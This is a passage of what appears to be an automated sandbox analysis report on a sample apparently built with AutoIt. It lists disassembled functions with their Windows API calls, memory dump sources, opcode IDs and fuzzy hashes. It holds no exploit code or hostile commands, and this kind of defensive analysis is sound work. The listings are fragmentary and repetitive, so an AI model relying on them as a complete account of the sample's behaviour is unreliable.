                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: AU3! ?0$EA06
                                                                            • API String ID: 4104443479-2512139867
                                                                            • Opcode ID: ed22ddc9728fffc0b4ddc303ed0ae917ef909e78407ba13abc680c4f5aa5748f
                                                                            • Instruction ID: 7ca5bc007af1fa5c9be613d45a07e44dbb0f955b3a7479e398b735d2adcf0b18
                                                                            • Opcode Fuzzy Hash: ed22ddc9728fffc0b4ddc303ed0ae917ef909e78407ba13abc680c4f5aa5748f
                                                                            • Instruction Fuzzy Hash: EE41AD25A2519A9BDF31BF588891BBF7BA58B45300F584175F882EB2C7D6208DB087E1
                                                                            Function 002D9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00284AB2: __fread_nolock.LIBCMT ref: 00284AD0
                                                                            • _wcscmp.LIBCMT ref: 002D9DE1
                                                                            • _wcscmp.LIBCMT ref: 002D9DF4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: b727b21a4275848cec4a423556bf513ac0e7ed87e29d784122d5369dafc92988
                                                                            • Instruction ID: 5d5e4136e22b2c6cd6674151d5e6009643c89686714bf8f136b9811ee9bd6aa3
                                                                            • Opcode Fuzzy Hash: b727b21a4275848cec4a423556bf513ac0e7ed87e29d784122d5369dafc92988
                                                                            • Instruction Fuzzy Hash: 4341E875A5021ABBDF21EEA4CC45FDFBBBDDF45710F00046AF900AB280D6719D548BA4
                                                                            Function 002831BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002C032B
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 002C0375
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002909E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X
                                                                            • API String ID: 3777226403-3081909835
                                                                            • Opcode ID: e064be4415a40dfe9c6f02e217282d3620f59d1b6f81727e8e6bcf7acad72a02
                                                                            • Instruction ID: d692637f78a96757e0916cbceb782e248c237dca3cd5df5b3987b4f0ec0117f2
                                                                            • Opcode Fuzzy Hash: e064be4415a40dfe9c6f02e217282d3620f59d1b6f81727e8e6bcf7acad72a02
                                                                            • Instruction Fuzzy Hash: 0021C375A212989BDF01DF94D845BEE7BFC9F49704F00405AE808E7281DBF45A99CFA1
                                                                            Function 002ED1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1102cf87dc551da68a9a55544a91171cb65e8aeb5db58ce7e9e7722f9b11a88d
                                                                            • Instruction ID: 9c75c8cea6fd223d5f9ece4be514e7d59b959901ce45a0c0785b41d639d72f42
                                                                            • Opcode Fuzzy Hash: 1102cf87dc551da68a9a55544a91171cb65e8aeb5db58ce7e9e7722f9b11a88d
                                                                            • Instruction Fuzzy Hash: 0AF168706183419FCB14DF29C480A6ABBE5FF88314F54892EF8999B392D770E955CF82
                                                                            Function 00281680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 81d29f1453c2943c82ca2090129cbdc7f7186f87f47ffe0a3fb9e7682431b33e
                                                                            • Instruction ID: 6d995d25fd9dbde45e27ce5135556e984e5f348fe37dbc77936285d1c4041731
                                                                            • Opcode Fuzzy Hash: 81d29f1453c2943c82ca2090129cbdc7f7186f87f47ffe0a3fb9e7682431b33e
                                                                            • Instruction Fuzzy Hash: 7A61DD75620209EBDF049F29D980AAA7BB8FF44350F1581A9EC59CF2D4EB31DA71CB50
                                                                            Function 002859D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002859F9
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00285A9E
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285ABB
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$_memset
                                                                            • String ID:
                                                                            • API String ID: 1505330794-0
                                                                            • Opcode ID: 167494728a1cd077f19c8f0d63c1b0822a735cef6295070cd41065120cd86846
                                                                            • Instruction ID: 0d72b23e803127cef5ff24f6203e8180f261dc675e7a33dfdb73ea16927f23e8
                                                                            • Opcode Fuzzy Hash: 167494728a1cd077f19c8f0d63c1b0822a735cef6295070cd41065120cd86846
                                                                            • Instruction Fuzzy Hash: A33191B45167128FC725EF24D8C4697BBE8FB48304F000E2EF99AC3280E771A954CB92
                                                                            Function 0029593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029A39B: __NMSG_WRITE.LIBCMT ref: 0029A3C2
                                                                              • Part of subcall function 0029A39B: __NMSG_WRITE.LIBCMT ref: 0029A3CC
                                                                            • __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029A3F8: GetModuleFileNameW.KERNEL32(00000000,003353BA,00000104,00000004,00000001,00291003), ref: 0029A48A
                                                                              • Part of subcall function 0029A3F8: ___crtMessageBoxW.LIBCMT ref: 0029A538
                                                                              • Part of subcall function 002932CF: ___crtCorExitProcess.LIBCMT ref: 002932D5
                                                                              • Part of subcall function 002932CF: ExitProcess.KERNEL32 ref: 002932DE
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: de050984e06b0148eb91198800cc1eebf9cd246c1951327c7073b9073936caa6
                                                                            • Instruction ID: c2786c1671068469e5a0ec020996709dd59e6dc7fafca4c31532faa4d9d940d6
                                                                            • Opcode Fuzzy Hash: de050984e06b0148eb91198800cc1eebf9cd246c1951327c7073b9073936caa6
                                                                            • Instruction Fuzzy Hash: 56019E36371B22DAFE176B349C42B2E32989F52770F51052AF819EB191DEB08D204BE1
                                                                            Function 002D92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 002D92D6
                                                                              • Part of subcall function 00292F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292F99
                                                                              • Part of subcall function 00292F85: GetLastError.KERNEL32(00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292FAB
                                                                            • _free.LIBCMT ref: 002D92E7
                                                                            • _free.LIBCMT ref: 002D92F9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                            • Instruction ID: 6e2f261368edc595156602912b614f31682921cbcdf7a71d42b82975486b3e23
                                                                            • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                            • Instruction Fuzzy Hash: 10E0C2A1324603A3CE20A9386884E8377FC0F88311724050FB80AD3A82CE20ECA08468
                                                                            Function 00275E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CALL
                                                                            • API String ID: 0-4196123274
                                                                            • Opcode ID: f53da50b3cb16b64ab7a632f5574e52c147225da0817c96a0278be761acaa88d
                                                                            • Instruction ID: 8b0abf93f36854189a844eae60c4f114a37976ed73cd714551e80dbcb997e2d2
                                                                            • Opcode Fuzzy Hash: f53da50b3cb16b64ab7a632f5574e52c147225da0817c96a0278be761acaa88d
                                                                            • Instruction Fuzzy Hash: 50325974528712CFCB24DF14C498A2AB7E1BF85304F15895DE88A9B362DB71EC61CF82
                                                                            Function 002EE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _strcat.LIBCMT ref: 002EE20C
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • _wcscpy.LIBCMT ref: 002EE29B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __itow__swprintf_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1012013722-0
                                                                            • Opcode ID: cefd85626afece1b4c69afc47ba17b2d1473b16c85cfdb01e130499fe28ebe66
                                                                            • Instruction ID: 6a9695a1ce09ceb58575f986b051619722b4b52267c8a247bee2ac08a83fc9fb
                                                                            • Opcode Fuzzy Hash: cefd85626afece1b4c69afc47ba17b2d1473b16c85cfdb01e130499fe28ebe66
                                                                            • Instruction Fuzzy Hash: 71913935A20615DFCB18EF19C581969B7E5EF49310B96C09AE85A8F362DB30ED61CF80
                                                                            Function 002D6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002D614E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID:
                                                                            • API String ID: 2358735015-0
                                                                            • Opcode ID: 3352a114548bd13b7b22ed7e3e7349b6026d35e7687aac052bd8ee888dfbb91e
                                                                            • Instruction ID: c95f79c50c79aff2c575766284ea020ffeb790b7a83d29d9267b6a91420d0ace
                                                                            • Opcode Fuzzy Hash: 3352a114548bd13b7b22ed7e3e7349b6026d35e7687aac052bd8ee888dfbb91e
                                                                            • Instruction Fuzzy Hash: 4941A5B65102099FDB11EFA8C8859AEB3B8EB44350B10452FE95A97381EB70DE65CB50
                                                                            Function 00290E38 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleMode
                                                                            • String ID:
                                                                            • API String ID: 3953868439-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 31cf4ce80c87067fc57b813c61f11bca9fc8b4a34947cc762a1c6037067fbf97
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: E131C471A1010ADFDB18DF58C4C0969F7A6FF59300B648AA5E449CB651EB71EDE1CB80
                                                                            Function 00285F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00285FEF
                                                                              • Part of subcall function 0029359C: __lock.LIBCMT ref: 002935A2
                                                                              • Part of subcall function 0029359C: DecodePointer.KERNEL32(00000001,?,00286004,002C8892), ref: 002935AE
                                                                              • Part of subcall function 0029359C: EncodePointer.KERNEL32(?,?,00286004,002C8892), ref: 002935B9
                                                                              • Part of subcall function 00285F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00285F18
                                                                              • Part of subcall function 00285F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00285F2D
                                                                              • Part of subcall function 00285240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0028526C
                                                                              • Part of subcall function 00285240: IsDebuggerPresent.KERNEL32 ref: 0028527E
                                                                              • Part of subcall function 00285240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002852E6
                                                                              • Part of subcall function 00285240: SetCurrentDirectoryW.KERNEL32(?), ref: 00285366
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0028602F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                            • String ID:
                                                                            • API String ID: 1438897964-0
                                                                            • Opcode ID: 7809ab55ca21dfc9ea085e0b4fc6e7761b04225ba33532474d7ad6f221234624
                                                                            • Instruction ID: 7fe2d113aad086091ae63c5218bf2d4fdbb94eec4fc1fd230f122aa9ee3c8b5b
                                                                            • Opcode Fuzzy Hash: 7809ab55ca21dfc9ea085e0b4fc6e7761b04225ba33532474d7ad6f221234624
                                                                            • Instruction Fuzzy Hash: 75118E718193059BC721EF69EC4994ABBECEF98710F00891EF484872A2DB709554CF95
                                                                            Function 002842F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00283E72,?,?,?,00000000), ref: 00284327
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00283E72,?,?,?,00000000), ref: 002C0717
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: d67caa264b848258048fa86c574a6c6261cc88b4af2c77c1022d5a561ca98e63
                                                                            • Instruction ID: 400f6bd289b6b33e1a705882f4ed6e7c9e9f99fd8c1f80cdee4ba52e1b84abbc
                                                                            • Opcode Fuzzy Hash: d67caa264b848258048fa86c574a6c6261cc88b4af2c77c1022d5a561ca98e63
                                                                            • Instruction Fuzzy Hash: 0701967415530ABFF3252E14CC8AF667A9CEB0176CF24C319FAE86A1D0C6B15C558B54
                                                                            Function 0029581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: 2c56b49e1ed2a5e0ffe3c700e13bc3215c54af732bb66ed0a7b548f5e07c6e3c
                                                                            • Instruction ID: 7d7fd7248db70376597e266e8c0bc36f25ce61cd2875d2eca2f89593f78a91a8
                                                                            • Opcode Fuzzy Hash: 2c56b49e1ed2a5e0ffe3c700e13bc3215c54af732bb66ed0a7b548f5e07c6e3c
                                                                            • Instruction Fuzzy Hash: 8501D471921619EBCF12AF658C0188E7BA1BF81320F084115F8245A1A1D7318A71DF91
                                                                            Function 002955C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • __lock_file.LIBCMT ref: 0029560B
                                                                              • Part of subcall function 00296E3E: __lock.LIBCMT ref: 00296E61
                                                                            • __fclose_nolock.LIBCMT ref: 00295616
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            • Opcode ID: 29ae116b7dee59a78c0d2aaff7517ca17bc3ffe6ebda2609abe516fe3eddea31
                                                                            • Instruction ID: 3183629aaea541a42d5cbab195dfe253c6476672a5b0ce868f479398afb4c62c
                                                                            • Opcode Fuzzy Hash: 29ae116b7dee59a78c0d2aaff7517ca17bc3ffe6ebda2609abe516fe3eddea31
                                                                            • Instruction Fuzzy Hash: 77F0BB71A31B259ADF127F759801B6E77D15F41334F598105F424AB1C2CB7C49219F51
                                                                            Function 0027E36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
